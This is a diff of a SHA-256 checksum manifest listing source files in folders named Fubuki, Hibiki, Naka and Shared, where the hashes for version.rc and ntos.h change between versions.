4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Fubuki\resource.h 4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Fubuki\resource.h
a2b59d06ad6f6af9ac19b5b15c987c246eb059eade447b63c3113646c6ef52a0 *Source\Fubuki\unbcl.h a2b59d06ad6f6af9ac19b5b15c987c246eb059eade447b63c3113646c6ef52a0 *Source\Fubuki\unbcl.h
dea152900c30bda730ba68cccacb95ff73e36b6cdd87551f980d28c353a104a0 *Source\Fubuki\version.rc b356eba53196c805864e2ac2fd5a4b38984a377698320c34dc70484de61f2adb *Source\Fubuki\version.rc
eccff5e3d98818d8ea5393d86379985c8eee5b0ac44d06e1c8b52b29d96cf066 *Source\Fubuki\wbemcomn.h eccff5e3d98818d8ea5393d86379985c8eee5b0ac44d06e1c8b52b29d96cf066 *Source\Fubuki\wbemcomn.h
7b5106df39693d85f43060cdc45b9405c7db3b9995f1fc8482bf602d33843dbf *Source\Hibiki\dllmain.c 7b5106df39693d85f43060cdc45b9405c7db3b9995f1fc8482bf602d33843dbf *Source\Hibiki\dllmain.c
769a7bccff14fec330c1d36704fc0c4060c2700a3f53f4a6148cbe90bb796ca5 *Source\Hibiki\Hibiki.vcxproj 769a7bccff14fec330c1d36704fc0c4060c2700a3f53f4a6148cbe90bb796ca5 *Source\Hibiki\Hibiki.vcxproj
@ -77,7 +80,7 @@ abd562aa6b8721caf958b4f87b67787a82ab81b64df21c46df01f67891c37ce7 *Source\Naka\Na
893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\cmdline.c 893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\cmdline.c
bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\cmdline.h bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\cmdline.h
107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Shared\minirtl.h 107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Shared\minirtl.h
0eee79ee4fa4692222fc647159ac532dc2019f568160ca4c9fed9de9cc39b593 *Source\Shared\ntos.h 4d545749c75f9d3aa7502b7056956912488feede3f5879178a91a9c32a2df0ab *Source\Shared\ntos.h
b9de99d3447bb1a125cb92aa1b3f9b56a59522436f1a1a97f23aac9cee90341c *Source\Shared\rtltypes.h b9de99d3447bb1a125cb92aa1b3f9b56a59522436f1a1a97f23aac9cee90341c *Source\Shared\rtltypes.h
c0dd0e6d2f4b23a97b6cabb9822b87adb6ae8723ee3e65831809e549b7efcb9a *Source\Shared\strtoul.c c0dd0e6d2f4b23a97b6cabb9822b87adb6ae8723ee3e65831809e549b7efcb9a *Source\Shared\strtoul.c
9cbedf9b92abaef3ea28de28dd523ac44079592178ef727c7003c339a5a54712 *Source\Shared\ultostr.c 9cbedf9b92abaef3ea28de28dd523ac44079592178ef727c7003c339a5a54712 *Source\Shared\ultostr.c